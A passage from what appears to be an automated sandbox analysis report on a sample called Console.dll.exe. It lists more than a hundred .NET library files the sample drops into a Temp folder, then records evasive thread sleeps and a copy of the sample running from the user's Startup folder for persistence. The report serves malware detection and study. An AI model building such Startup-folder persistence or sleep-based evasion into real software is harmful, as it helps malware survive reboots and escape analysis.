            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceModel.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.EventBasedAsync.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.Lightweight.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Handles.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Concurrent.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Queryable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.SqlServer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tools.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Dynamic.Runtime.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\netstandard.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Mail.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Loader.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.TypeConverter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.HttpListener.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Process.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.ProtectedData.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Writer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.ILGeneration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Console.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.MemoryMappedFiles.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.SecureString.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLite.Interop.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.VisualC.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.Registry.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ObjectModel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Emit.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Resources.Reader.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.UnmanagedMemoryStream.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.CSharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.FileSystem.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.DriveInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.TypeExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Buffers.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Overlapped.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.Vectors.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\sni.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.TraceSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Drawing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.JavaScript.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Permissions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\EntityFramework.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\WebSocket4Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Memory.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Thread.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XPath.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Win32.SystemEvents.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Tar.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.DataSetExtensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Claims.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Cng.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.ThreadPool.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NameResolution.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.NonGeneric.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Debug.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XmlSerializer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Globalization.Calendars.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Algorithms.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Contracts.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.CompilerServices.Unsafe.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Reflection.Metadata.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.DataAnnotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SQLitePCLRaw.core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.Tracing.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ComponentModel.Annotations.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Http.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Json.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Serialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.Linq.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SqlClient.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebHeaderCollection.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.IsolatedStorage.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Configuration.ConfigurationManager.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Numerics.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.Common.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Compression.Brotli.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.FileVersionInfo.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Linq.Expressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Security.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.FileSystem.Watcher.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.StackTrace.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.ReaderWriter.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Xml.XDocument.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.Data.Sqlite.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\websocket-sharp.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.ServiceProcess.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\Microsoft.VisualBasic.Core.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Sockets.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Principal.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.CoreLib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.IO.Pipes.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.Requests.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Timer.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.NetworkInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Parallel.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.ServicePoint.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Specialized.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Primitives.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.Uri.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Collections.Immutable.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.RegularExpressions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Data.SQLite.EF6.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.CodeDom.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Private.DataContractSerialization.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Tasks.Extensions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebProxy.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.WebSockets.Client.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Net.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.Cryptography.Encoding.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\mscorlib.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Formats.Asn1.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Diagnostics.DiagnosticSource.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Security.AccessControl.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Windows.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Text.Encodings.Web.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\BouncyCastle.Crypto.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.InteropServices.RuntimeInformation.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Runtime.Serialization.Xml.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\SuperSocket.ClientEngine.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Threading.Channels.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exeDropped PE file which has not been started: C:\Users\user\AppData\Local\Temp\.net\Console.dll\e98\System.Transactions.Local.dllJump to dropped file
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7304Thread sleep count: 88 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7624Thread sleep count: 85 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 7304Thread sleep count: 121 > 30Jump to behavior
            Source: C:\Users\user\Desktop\Console.dll.exe TID: 5496Thread sleep time: -922337203685477s >= -30000sJump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 8056Thread sleep count: 389 > 30Jump to behavior
            Source: C:\Users\user\AppData\Roaming\Microsoft\Windows\Start Menu\Programs\Startup\Console.dll.exe TID: 8048Thread sleep count: 73 > 30Jump to behavior
